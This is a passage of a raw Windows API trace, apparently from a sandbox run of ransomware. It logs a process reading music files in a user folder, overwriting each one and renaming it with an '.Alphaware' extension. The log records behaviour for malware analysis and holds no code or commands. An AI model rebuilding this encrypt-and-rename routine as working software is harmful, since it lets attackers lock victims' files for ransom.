lpOldMode=0x23e958) returned 1 [0088.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\eriabnwg9i.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23edee0 | out: lpFileInformation=0x23edee0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bd4ef0, ftCreationTime.dwHighDateTime=0x1d96e90, ftLastAccessTime.dwLowDateTime=0x4df044f0, ftLastAccessTime.dwHighDateTime=0x1d97212, ftLastWriteTime.dwLowDateTime=0x4df044f0, ftLastWriteTime.dwHighDateTime=0x1d97212, nFileSizeHigh=0x0, nFileSizeLow=0xfa91)) returned 1 [0088.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.075] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\eriabnwg9i.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.075] GetFileType (hFile=0x254) returned 0x1 [0088.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.075] GetFileType (hFile=0x254) returned 0x1 [0088.075] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xfa91 [0088.075] ReadFile (in: hFile=0x254, lpBuffer=0x23ee158, nNumberOfBytesToRead=0xfa91, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ee158*, lpNumberOfBytesRead=0x23ea98*=0xfa91, lpOverlapped=0x0) returned 1 [0088.077] CloseHandle (hObject=0x254) returned 1 [0088.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.096] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\eriabnwg9i.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.097] GetFileType (hFile=0x254) returned 0x1 [0088.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.098] GetFileType (hFile=0x254) returned 0x1 [0088.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\eriabnwg9i.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bd4ef0, ftCreationTime.dwHighDateTime=0x1d96e90, ftLastAccessTime.dwLowDateTime=0x4df044f0, ftLastAccessTime.dwHighDateTime=0x1d97212, ftLastWriteTime.dwLowDateTime=0x86b635e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14ef4)) returned 1 [0088.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.101] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\eriabnwg9i.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\eriabnwg9i.m4a.alphaware")) returned 1 [0088.101] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav", dwFileAttributes=0x80) returned 1 [0088.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.102] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\jl gdxo.wav"), fInfoLevelId=0x0, lpFileInformation=0x24ab950 | out: lpFileInformation=0x24ab950*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x64c24e10, ftCreationTime.dwHighDateTime=0x1d96bf7, ftLastAccessTime.dwLowDateTime=0xf4824a80, ftLastAccessTime.dwHighDateTime=0x1d97059, ftLastWriteTime.dwLowDateTime=0xf4824a80, ftLastWriteTime.dwHighDateTime=0x1d97059, nFileSizeHigh=0x0, nFileSizeLow=0x16725)) returned 1 [0088.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.102] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\jl gdxo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.102] GetFileType (hFile=0x254) returned 0x1 [0088.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.103] GetFileType (hFile=0x254) returned 0x1 [0088.103] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x16725 [0088.103] ReadFile (in: hFile=0x254, lpBuffer=0x12793710, nNumberOfBytesToRead=0x16725, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12793710*, lpNumberOfBytesRead=0x23ea98*=0x16725, lpOverlapped=0x0) returned 1 [0088.104] CloseHandle (hObject=0x254) returned 1 [0088.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.128] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\jl gdxo.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.129] GetFileType (hFile=0x254) returned 0x1 [0088.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.129] GetFileType (hFile=0x254) returned 0x1 [0088.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.133] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\jl gdxo.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64c24e10, ftCreationTime.dwHighDateTime=0x1d96bf7, ftLastAccessTime.dwLowDateTime=0xf4824a80, ftLastAccessTime.dwHighDateTime=0x1d97059, ftLastWriteTime.dwLowDateTime=0x86baf8a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1dfb4)) returned 1 [0088.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.133] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\jl gdxo.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\Jl GdXo.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\jl gdxo.wav.alphaware")) returned 1 [0088.134] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a", dwFileAttributes=0x80) returned 1 [0088.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.135] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\kakqa9otk.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23f4d88 | out: lpFileInformation=0x23f4d88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x53886c00, ftCreationTime.dwHighDateTime=0x1d96d24, ftLastAccessTime.dwLowDateTime=0x2a8082c0, ftLastAccessTime.dwHighDateTime=0x1d96ec8, ftLastWriteTime.dwLowDateTime=0x2a8082c0, ftLastWriteTime.dwHighDateTime=0x1d96ec8, nFileSizeHigh=0x0, nFileSizeLow=0x917)) returned 1 [0088.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.136] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\kakqa9otk.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.136] GetFileType (hFile=0x254) returned 0x1 [0088.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.136] GetFileType (hFile=0x254) returned 0x1 [0088.136] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x917 [0088.136] ReadFile (in: hFile=0x254, lpBuffer=0x23f5920, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23f5920*, lpNumberOfBytesRead=0x23ea98*=0x917, lpOverlapped=0x0) returned 1 [0088.137] CloseHandle (hObject=0x254) returned 1 [0088.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.155] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\kakqa9otk.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.156] GetFileType (hFile=0x254) returned 0x1 [0088.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.156] GetFileType (hFile=0x254) returned 0x1 [0088.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.157] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\kakqa9otk.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53886c00, ftCreationTime.dwHighDateTime=0x1d96d24, ftLastAccessTime.dwLowDateTime=0x2a8082c0, ftLastAccessTime.dwHighDateTime=0x1d96ec8, ftLastWriteTime.dwLowDateTime=0x86bd5a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcf4)) returned 1 [0088.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.157] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\kakqa9otk.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\kAkqA9OTk.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\kakqa9otk.m4a.alphaware")) returned 1 [0088.158] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav", dwFileAttributes=0x80) returned 1 [0088.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.160] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\lijgz_b-guf6ppz.wav"), fInfoLevelId=0x0, lpFileInformation=0x247b380 | out: lpFileInformation=0x247b380*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19b10df0, ftCreationTime.dwHighDateTime=0x1d972f8, ftLastAccessTime.dwLowDateTime=0x485a2640, ftLastAccessTime.dwHighDateTime=0x1d9747a, ftLastWriteTime.dwLowDateTime=0x485a2640, ftLastWriteTime.dwHighDateTime=0x1d9747a, nFileSizeHigh=0x0, nFileSizeLow=0xb149)) returned 1 [0088.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.161] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\lijgz_b-guf6ppz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.161] GetFileType (hFile=0x254) returned 0x1 [0088.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.161] GetFileType (hFile=0x254) returned 0x1 [0088.161] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xb149 [0088.161] ReadFile (in: hFile=0x254, lpBuffer=0x247b618, nNumberOfBytesToRead=0xb149, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x247b618*, lpNumberOfBytesRead=0x23ea98*=0xb149, lpOverlapped=0x0) returned 1 [0088.162] CloseHandle (hObject=0x254) returned 1 [0088.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.180] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\lijgz_b-guf6ppz.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.182] GetFileType (hFile=0x254) returned 0x1 [0088.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.182] GetFileType (hFile=0x254) returned 0x1 [0088.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\lijgz_b-guf6ppz.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19b10df0, ftCreationTime.dwHighDateTime=0x1d972f8, ftLastAccessTime.dwLowDateTime=0x485a2640, ftLastAccessTime.dwHighDateTime=0x1d9747a, ftLastWriteTime.dwLowDateTime=0x86c21cc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xed34)) returned 1 [0088.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.184] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\lijgz_b-guf6ppz.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\LIjGz_b-guf6pPz.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\lijgz_b-guf6ppz.wav.alphaware")) returned 1 [0088.185] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav", dwFileAttributes=0x80) returned 1 [0088.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\poajqkurwlncz.wav"), fInfoLevelId=0x0, lpFileInformation=0x2525f08 | out: lpFileInformation=0x2525f08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd19a0d0, ftCreationTime.dwHighDateTime=0x1d96e29, ftLastAccessTime.dwLowDateTime=0x8f96b840, ftLastAccessTime.dwHighDateTime=0x1d9753b, ftLastWriteTime.dwLowDateTime=0x8f96b840, ftLastWriteTime.dwHighDateTime=0x1d9753b, nFileSizeHigh=0x0, nFileSizeLow=0x18735)) returned 1 [0088.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.186] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\poajqkurwlncz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.186] GetFileType (hFile=0x254) returned 0x1 [0088.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.186] GetFileType (hFile=0x254) returned 0x1 [0088.186] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x18735 [0088.186] ReadFile (in: hFile=0x254, lpBuffer=0x128e3738, nNumberOfBytesToRead=0x18735, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x128e3738*, lpNumberOfBytesRead=0x23ea98*=0x18735, lpOverlapped=0x0) returned 1 [0088.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\poajqkurwlncz.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.234] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\poajqkurwlncz.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd19a0d0, ftCreationTime.dwHighDateTime=0x1d96e29, ftLastAccessTime.dwLowDateTime=0x8f96b840, ftLastAccessTime.dwHighDateTime=0x1d9753b, ftLastWriteTime.dwLowDateTime=0x86c940e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20a74)) returned 1 [0088.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.234] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\poajqkurwlncz.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\pOajqkURwLncz.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\poajqkurwlncz.wav.alphaware")) returned 1 [0088.235] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a", dwFileAttributes=0x80) returned 1 [0088.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\sraa yna6fae6hy.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23c6d08 | out: lpFileInformation=0x23c6d08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c543090, ftCreationTime.dwHighDateTime=0x1d96756, ftLastAccessTime.dwLowDateTime=0xf85dd470, ftLastAccessTime.dwHighDateTime=0x1d97000, ftLastWriteTime.dwLowDateTime=0xf85dd470, ftLastWriteTime.dwHighDateTime=0x1d97000, nFileSizeHigh=0x0, nFileSizeLow=0xe3bc)) returned 1 [0088.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.236] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\sraa yna6fae6hy.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.236] ReadFile (in: hFile=0x254, lpBuffer=0x23c6fa0, nNumberOfBytesToRead=0xe3bc, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23c6fa0*, lpNumberOfBytesRead=0x23ea98*=0xe3bc, lpOverlapped=0x0) returned 1 [0088.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.256] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\sraa yna6fae6hy.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\sraa yna6fae6hy.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c543090, ftCreationTime.dwHighDateTime=0x1d96756, ftLastAccessTime.dwLowDateTime=0xf85dd470, ftLastAccessTime.dwHighDateTime=0x1d97000, ftLastWriteTime.dwLowDateTime=0x86ce03a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13074)) returned 1 [0088.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.260] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\sraa yna6fae6hy.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\srAa yNa6Fae6hy.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\sraa yna6fae6hy.m4a.alphaware")) returned 1 [0088.261] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav", dwFileAttributes=0x80) returned 1 [0088.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\t-km3hlyo8hom.wav"), fInfoLevelId=0x0, lpFileInformation=0x246b900 | out: lpFileInformation=0x246b900*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf88f680, ftCreationTime.dwHighDateTime=0x1d96b6c, ftLastAccessTime.dwLowDateTime=0x96f2a030, ftLastAccessTime.dwHighDateTime=0x1d96e5c, ftLastWriteTime.dwLowDateTime=0x96f2a030, ftLastWriteTime.dwHighDateTime=0x1d96e5c, nFileSizeHigh=0x0, nFileSizeLow=0x7110)) returned 1 [0088.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.262] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\t-km3hlyo8hom.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.262] ReadFile (in: hFile=0x254, lpBuffer=0x246bb88, nNumberOfBytesToRead=0x7110, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x246bb88*, lpNumberOfBytesRead=0x23ea98*=0x7110, lpOverlapped=0x0) returned 1 [0088.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.282] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\t-km3hlyo8hom.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.285] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\t-km3HlYo8hOM.wav" 